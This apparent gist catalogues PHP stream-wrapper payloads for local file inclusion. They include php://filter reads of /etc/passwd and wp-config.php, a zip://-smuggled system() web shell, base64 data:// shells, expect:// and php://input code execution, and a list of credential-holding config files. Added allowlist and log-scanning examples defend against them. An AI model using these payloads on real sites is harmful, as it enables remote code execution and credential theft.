@tanaka-geek
Last active June 30, 2021 22:40
PHP stream wrappers that will come in handy

php://filter

Returns the contents of a PHP file as text (base64-encoded here) instead of executing it, so the source can be read.

php://filter/convert.base64-encode/resource=file:///challenge
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/wp-config.php

zip://

Reads a file out of a zip archive and includes it; the entry name follows the # (%23 in the URL).

echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php

data://

Requires allow_url_include=On.

Executes the PHP code that follows the wrapper, in the form data://<content-type>,<code> (or data://<content-type>;base64,<encoded code>).

http://example.com/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.com/?page=data://text/plain,<?php phpinfo(); ?>
http://example.com/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
// the base64 above decodes to "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

expect://

Directly executes a shell command. The expect extension (PECL) is not installed by default, so this wrapper is usually unavailable.

http://example.com/index.php?page=expect://id

php://input

Sends PHP code in the POST body; php://input returns that body and the include executes it. The trailing %00 is there to cut off anything the script appends to the parameter; that null-byte truncation was fixed in PHP 5.3.4.

curl -X POST 'example.com?page=php://input%00' --data "<?php phpinfo(); ?>"

The same request as seen in Burp Suite:

POST example.com?page=php://input%00 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data
Content-Length: 1337
Referer: http://example.com
Cookie: PHPSESSID=asdklahfaiohsfioaofha
Connection: keep-alive
Upgrade-Insecure-Requests: 1

<?php system('id'); ?>
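Every wrapper above only works because the page parameter reaches include() unchanged. The following is an added example, not code from this gist: the vulnerable pattern beside an allowlisted version that rejects every such value before include() sees it. The page directory, page names and function names are assumptions for illustration.

```php
<?php
// Added example, not code from the gist: the include pattern that every
// wrapper above abuses, beside an allowlisted version that rejects them.
// Directory and page names are assumptions for illustration.

// Vulnerable form: whatever arrives in ?page= (a wrapper URL, an absolute
// path, a traversal string) goes straight into include().
function vulnerableInclude(string $page): void
{
    include $page;
}

// Hardened form: the request may only pick a key from a fixed allowlist.
// As defence in depth the chosen file is resolved with realpath() and must
// stay under $baseDir. Returns the resolved path, or null when rejected.
function resolvePage(string $page, string $baseDir): ?string
{
    $allowed = ['home' => 'home.php', 'about' => 'about.php'];
    if (!array_key_exists($page, $allowed)) {
        return null;   // "php://filter/...", "zip://..." etc. are not keys
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$page]);
    if ($base === false || $file === false) {
        return null;   // directory or page file does not exist
    }
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;   // resolved outside the page directory (symlink etc.)
    }
    return $file;
}

function hardenedInclude(string $page, string $baseDir): void
{
    $file = resolvePage($page, $baseDir);
    if ($file === null) {
        http_response_code(404);
        return;
    }
    include $file;
}

// Demo: create a throwaway page directory and feed the resolver the kinds
// of values the wrappers above use (constructed inputs).
$baseDir = sys_get_temp_dir() . '/wrapper_demo_pages';
if (!is_dir($baseDir)) {
    mkdir($baseDir, 0700);
}
file_put_contents($baseDir . '/home.php', "<?php echo 'home page';\n");

$inputs = [
    'home',
    'php://filter/convert.base64-encode/resource=index.php',
    'zip://shell.jpg#payload.php',
    'data://text/plain,<?php phpinfo(); ?>',
    'expect://id',
    "php://input\0",
    '../../../etc/passwd',
];
foreach ($inputs as $in) {
    $out = resolvePage($in, $baseDir);
    printf("%-55s -> %s\n", str_replace("\0", '\0', $in), $out ?? 'rejected');
}
```

Run it with the php CLI: only `home` resolves to a path, every wrapper-style or traversal value is rejected by the allowlist before realpath() or include() is reached. The realpath() containment check adds nothing against these inputs, but it catches a symlinked page file pointing outside the directory.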

The files below are worth reading through php://filter, since their PHP source would otherwise be executed rather than shown.

/etc/phpmyadmin/config.inc.php
/etc/squirrelmail/config/config.php
/etc/squirrelmail/config_default.php
/etc/squirrelmail/config_local.php
/etc/squirrelmail/config.php
/etc/squirrelmail/filters_setup.php
/etc/squirrelmail/index.php
/etc/squirrelmail/sqspell_config.php
/Library/WebServer/Documents/default.php
/Library/WebServer/Documents/index.php
/private/etc/squirrelmail/config/config.php
/srv/www/htdos/squirrelmail/config/config.php
/usr/local/php4/apache2.conf.php
/usr/local/php4/apache.conf.php
/usr/local/php4/httpd.conf.php
/usr/local/php5/apache2.conf.php
/usr/local/php5/apache.conf.php
/usr/local/php5/httpd.conf.php
/usr/local/php/apache2.conf.php
/usr/local/php/apache.conf.php
/usr/local/php/httpd.conf.php
/usr/local/psa/admin/htdocs/domains/databases/phpMyAdmin/libraries/config.default.php
/usr/share/squirrelmail/config/config.php
/usr/share/squirrelmail/plugins/squirrel_logger/setup.php
/var/www/html/squirrelmail/config/config.php
/var/www/html/wp-config.php
/var/www/html/wordpress/wp-config.php
/var/www/html/wp/wp-config.php
/var/www/squirrelmail/config/config.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/xampp/htdocs/admin.php
/xampp/phpMyAdmin/config.inc.php
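For triage on the defending side, an added example (not from this gist) that scans access-log lines for the wrapper schemes above, a %00 in the request target, and requests for the configuration files in the list above. The log format and sample lines are constructed for illustration, and the indicator set is an assumption meant to be extended.

```php
<?php
// Added example, not code from the gist: flag access-log requests that carry
// one of the wrappers above, or that reach for the configuration files
// listed above. Log format and lines are constructed for illustration.

// Indicators, checked against the URL-decoded request target.
const WRAPPER_INDICATORS = [
    'php_filter'     => '~php://filter~i',
    'php_input'      => '~php://input~i',
    'zip'            => '~zip://~i',
    'data'           => '~(?<![a-z0-9])data:(?://)?[a-z0-9.+/-]+~i',   // data://text/plain or data:text/plain
    'expect'         => '~expect://~i',
    'sensitive_file' => '~(?:wp-config|config\.inc|config_default|config_local)\.php~i',
];

// Returns the indicator names found in one combined-log-format line.
function findIndicators(string $line): array
{
    // Take the target out of "GET /path?query HTTP/1.1".
    if (!preg_match('~"(?:GET|POST) (\S+) HTTP/~', $line, $m)) {
        return [];
    }
    $target = rawurldecode($m[1]);
    $hits = [];
    foreach (WRAPPER_INDICATORS as $name => $re) {
        if (preg_match($re, $target)) {
            $hits[] = $name;
        }
    }
    // A %00 in the target decodes to a real NUL byte: the truncation trick.
    if (strpos($target, "\0") !== false) {
        $hits[] = 'null_byte';
    }
    return $hits;
}

// Returns only the lines that carry indicators, with what was found.
function scanLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $hits = findIndicators($line);
        if ($hits !== []) {
            $findings[] = ['indicators' => $hits, 'line' => $line];
        }
    }
    return $findings;
}

// Constructed sample log lines (combined log format).
$sample = [
    '10.0.0.5 - - [30/Jun/2021:22:40:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [30/Jun/2021:22:40:02 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wp-config.php HTTP/1.1" 200 8123',
    '10.0.0.9 - - [30/Jun/2021:22:40:03 +0000] "GET /index.php?page=zip://shell.jpg%23payload.php&cmd=id HTTP/1.1" 200 61',
    '10.0.0.9 - - [30/Jun/2021:22:40:04 +0000] "GET /?page=data://text/plain,%3C%3Fphp%20phpinfo()%3B%20%3F%3E HTTP/1.1" 200 70412',
    '10.0.0.9 - - [30/Jun/2021:22:40:05 +0000] "POST /index.php?page=php://input%00 HTTP/1.1" 200 59',
];
foreach (scanLog($sample) as $f) {
    echo implode(',', $f['indicators']), "\t", $f['line'], "\n";
}
```

On the sample, the first line is clean, the second reports php_filter and sensitive_file, the third zip, the fourth data, and the fifth php_input together with null_byte. Decoding the target before matching matters: an encoded `php%3A%2F%2Ffilter` would otherwise slip past the patterns.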